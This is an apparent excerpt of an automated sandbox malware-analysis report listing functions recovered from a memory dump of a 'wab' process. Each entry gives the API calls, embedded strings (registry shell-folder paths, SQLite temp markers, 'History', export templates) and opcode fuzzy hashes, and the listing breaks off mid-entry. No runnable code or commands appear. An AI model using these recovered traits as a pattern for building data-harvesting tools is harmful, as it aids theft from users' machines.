                  • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                  • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                  • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                  • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                  Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcmpmemset$_mbscpymemcpystrlen
                  • String ID:
                  • API String ID: 265355444-0
                  • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                  • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                  • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                  • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                  Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                    • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                    • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                  • memset.MSVCRT ref: 0040C439
                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                  • _wcsupr.MSVCRT ref: 0040C481
                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                  • memset.MSVCRT ref: 0040C4D0
                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                  • String ID:
                  • API String ID: 1973883786-0
                  • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                  • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                  • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                  • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                  Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 004116FF
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                    • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                  • API String ID: 2618321458-3614832568
                  • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                  • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                  • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                  • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                  Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 004185FC
                  • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                  • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@AttributesFilememset
                  • String ID:
                  • API String ID: 776155459-0
                  • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                  • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                  • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                  • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                  Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                  Download Yara Rule
                  APIs
                  • AreFileApisANSI.KERNEL32 ref: 004174FC
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                  • malloc.MSVCRT ref: 00417524
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                  • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                  • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                  • String ID:
                  • API String ID: 2308052813-0
                  • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                  • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                  • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                  • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                  Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                  Download Yara Rule
                  APIs
                  • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                  • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                  • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: PathTemp$??3@
                  • String ID: %s\etilqs_$etilqs_
                  • API String ID: 1589464350-1420421710
                  • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                  • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                  Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040FDD5
                    • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                  • _snwprintf.MSVCRT ref: 0040FE1F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                  • String ID: <%s>%s</%s>$</item>$<item>
                  • API String ID: 1775345501-2769808009
                  • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                  • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                  • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                  • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                  Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                  Download Yara Rule
                  APIs
                  • wcscpy.MSVCRT ref: 0041477F
                  • wcscpy.MSVCRT ref: 0041479A
                  • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                  • CloseHandle.KERNEL32(00000000), ref: 004147C8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscpy$CloseCreateFileHandle
                  • String ID: General
                  • API String ID: 999786162-26480598
                  • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                  • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                  • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                  • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                  Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ErrorLastMessage_snwprintf
                  • String ID: Error$Error %d: %s
                  • API String ID: 313946961-1552265934
                  • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                  • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                  • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                  • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                  Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: foreign key constraint failed$new$oid$old
                  • API String ID: 0-1953309616
                  • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                  • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                  • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                  • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                  Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                  • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                  • unknown column "%s" in foreign key definition, xrefs: 00431858
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                  • API String ID: 3510742995-272990098
                  • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                  • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                  • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                  • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                  Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: gj
                  • API String ID: 1297977491-4203073231
                  • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                  • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                  • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                  • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                  Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                    • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                  • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                  • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                  • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                  Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                  Download Yara Rule
                  APIs
                  • AreFileApisANSI.KERNEL32 ref: 00417497
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                  • malloc.MSVCRT ref: 004174BD
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                  • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                  • String ID:
                  • API String ID: 2903831945-0
                  • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                  • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                  • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                  • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                  Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                  Download Yara Rule
                  APIs
                  • GetParent.USER32(?), ref: 0040D453
                  • GetWindowRect.USER32(?,?), ref: 0040D460
                  • GetClientRect.USER32(00000000,?), ref: 0040D46B
                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$Rect$ClientParentPoints
                  • String ID:
                  • API String ID: 4247780290-0
                  • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                  • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                  • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                  • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                  Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                  • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                  • memset.MSVCRT ref: 004450CD
                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                  • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                  • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                  • String ID:
                  • API String ID: 1471605966-0
                  • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                  • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                  Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                  Download Yara Rule
                  APIs
                  • wcscpy.MSVCRT ref: 0044475F
                  • wcscat.MSVCRT ref: 0044476E
                  • wcscat.MSVCRT ref: 0044477F
                  • wcscat.MSVCRT ref: 0044478E
                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                    • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                    • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                  • String ID: \StringFileInfo\
                  • API String ID: 102104167-2245444037
                  • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                  • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                  • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                  • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                  Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                  • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                  • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                  • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                  Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$??3@
                  • String ID: g4@
                  • API String ID: 3314356048-2133833424
                  • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                  • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                  • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                  • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                  Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _memicmpwcslen
                  • String ID: @@@@$History
                  • API String ID: 1872909662-685208920
                  • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                  • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                  • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                  • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                  Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 004100FB
                  • memset.MSVCRT ref: 00410112
                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                  • _snwprintf.MSVCRT ref: 00410141
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_snwprintf_wcslwrwcscpy
                  • String ID: </%s>
                  • API String ID: 3400436232-259020660
                  • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                  • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                  Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040D58D
                  • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                  • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ChildEnumTextWindowWindowsmemset
                  • String ID: caption
                  • API String ID: 1523050162-4135340389
                  • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                  • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                  • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                  • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                  Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
